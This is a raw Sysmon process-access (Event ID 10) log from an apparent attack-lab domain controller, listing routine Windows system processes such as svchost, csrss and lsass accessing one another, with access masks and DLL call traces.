08:41:06.199{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-3100-000000007F01}2212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-1000-000000007F01}11441872C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.183{5D479F2C-16A1-5F84-1200-000000007F01}12081924C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|c:\windows\system32\es.dll+118e5|c:\windows\system32\es.dll+13b72|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.168{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.152{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.137{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.137{5D479F2C-16A1-5F84-1000-000000007F01}11441872C:\Windows\system32\svchost.exe{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 